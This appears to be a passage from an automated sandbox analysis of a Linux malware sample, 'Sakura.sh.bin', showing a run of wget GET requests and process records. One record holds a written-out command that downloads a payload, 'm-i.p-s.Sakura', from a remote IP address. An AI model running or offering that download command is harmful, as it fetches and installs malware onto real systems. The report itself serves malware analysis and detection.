                              3192.168.2.205511445.135.194.2880
                              TimestampBytes transferredDirectionData
                              Mar 18, 2025 13:37:58.694766998 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                              User-Agent: Wget/1.17.1 (linux-gnu)
                              Accept: */*
                              Accept-Encoding: identity
                              Host: 45.135.194.28
                              Connection: Keep-Alive


                              Session IDSource IPSource PortDestination IPDestination Port
                              4192.168.2.205511645.135.194.2880
                              TimestampBytes transferredDirectionData
                              Mar 18, 2025 13:38:04.322434902 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                              User-Agent: Wget/1.17.1 (linux-gnu)
                              Accept: */*
                              Accept-Encoding: identity
                              Host: 45.135.194.28
                              Connection: Keep-Alive


                              Session IDSource IPSource PortDestination IPDestination Port
                              5192.168.2.205511845.135.194.2880
                              TimestampBytes transferredDirectionData
                              Mar 18, 2025 13:38:10.984224081 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                              User-Agent: Wget/1.17.1 (linux-gnu)
                              Accept: */*
                              Accept-Encoding: identity
                              Host: 45.135.194.28
                              Connection: Keep-Alive


                              Session IDSource IPSource PortDestination IPDestination Port
                              6192.168.2.205512045.135.194.2880
                              TimestampBytes transferredDirectionData
                              Mar 18, 2025 13:38:18.666766882 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                              User-Agent: Wget/1.17.1 (linux-gnu)
                              Accept: */*
                              Accept-Encoding: identity
                              Host: 45.135.194.28
                              Connection: Keep-Alive


                              Session IDSource IPSource PortDestination IPDestination Port
                              7192.168.2.205512245.135.194.2880
                              TimestampBytes transferredDirectionData
                              Mar 18, 2025 13:38:27.376090050 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                              User-Agent: Wget/1.17.1 (linux-gnu)
                              Accept: */*
                              Accept-Encoding: identity
                              Host: 45.135.194.28
                              Connection: Keep-Alive


                              Session IDSource IPSource PortDestination IPDestination Port
                              8192.168.2.205512445.135.194.2880
                              TimestampBytes transferredDirectionData
                              Mar 18, 2025 13:38:37.012166977 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                              User-Agent: Wget/1.17.1 (linux-gnu)
                              Accept: */*
                              Accept-Encoding: identity
                              Host: 45.135.194.28
                              Connection: Keep-Alive


                              Session IDSource IPSource PortDestination IPDestination Port
                              9192.168.2.205512645.135.194.2880
                              TimestampBytes transferredDirectionData
                              Mar 18, 2025 13:38:47.690439939 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                              User-Agent: Wget/1.17.1 (linux-gnu)
                              Accept: */*
                              Accept-Encoding: identity
                              Host: 45.135.194.28
                              Connection: Keep-Alive


                              Session IDSource IPSource PortDestination IPDestination Port
                              10192.168.2.205512845.135.194.2880
                              TimestampBytes transferredDirectionData
                              Mar 18, 2025 13:38:59.406023026 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                              User-Agent: Wget/1.17.1 (linux-gnu)
                              Accept: */*
                              Accept-Encoding: identity
                              Host: 45.135.194.28
                              Connection: Keep-Alive


                              Session IDSource IPSource PortDestination IPDestination Port
                              11192.168.2.205513045.135.194.2880
                              TimestampBytes transferredDirectionData
                              Mar 18, 2025 13:39:11.461536884 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                              User-Agent: Wget/1.17.1 (linux-gnu)
                              Accept: */*
                              Accept-Encoding: identity
                              Host: 45.135.194.28
                              Connection: Keep-Alive


                              Session IDSource IPSource PortDestination IPDestination Port
                              12192.168.2.205513245.135.194.2880
                              TimestampBytes transferredDirectionData
                              Mar 18, 2025 13:39:23.255594969 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                              User-Agent: Wget/1.17.1 (linux-gnu)
                              Accept: */*
                              Accept-Encoding: identity
                              Host: 45.135.194.28
                              Connection: Keep-Alive


                              Session IDSource IPSource PortDestination IPDestination Port
                              13192.168.2.205513445.135.194.2880
                              TimestampBytes transferredDirectionData
                              Mar 18, 2025 13:39:34.903887987 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                              User-Agent: Wget/1.17.1 (linux-gnu)
                              Accept: */*
                              Accept-Encoding: identity
                              Host: 45.135.194.28
                              Connection: Keep-Alive


                              Session IDSource IPSource PortDestination IPDestination Port
                              14192.168.2.205513645.135.194.2880
                              TimestampBytes transferredDirectionData
                              Mar 18, 2025 13:39:46.557913065 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                              User-Agent: Wget/1.17.1 (linux-gnu)
                              Accept: */*
                              Accept-Encoding: identity
                              Host: 45.135.194.28
                              Connection: Keep-Alive


                              Session IDSource IPSource PortDestination IPDestination Port
                              15192.168.2.205513845.135.194.2880
                              TimestampBytes transferredDirectionData
                              Mar 18, 2025 13:39:58.227543116 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                              User-Agent: Wget/1.17.1 (linux-gnu)
                              Accept: */*
                              Accept-Encoding: identity
                              Host: 45.135.194.28
                              Connection: Keep-Alive


                              System Behavior

                              Start time (UTC):12:37:46
                              Start date (UTC):18/03/2025
                              Path:/bin/bash
                              Arguments:/bin/bash /tmp/Sakura.sh.bin
                              File size:1037528 bytes
                              MD5 hash:5e666695cf08d1638bb85684e30185ee

                              Start time (UTC):12:37:46
                              Start date (UTC):18/03/2025
                              Path:/bin/bash
                              Arguments:-
                              File size:1037528 bytes
                              MD5 hash:5e666695cf08d1638bb85684e30185ee

                              Start time (UTC):12:37:46
                              Start date (UTC):18/03/2025
                              Path:/usr/bin/wget
                              Arguments:wget http://45.135.194.28/m-i.p-s.Sakura
                              File size:474656 bytes
                              MD5 hash:acaead6d3c5bcc35a12ab496fa834365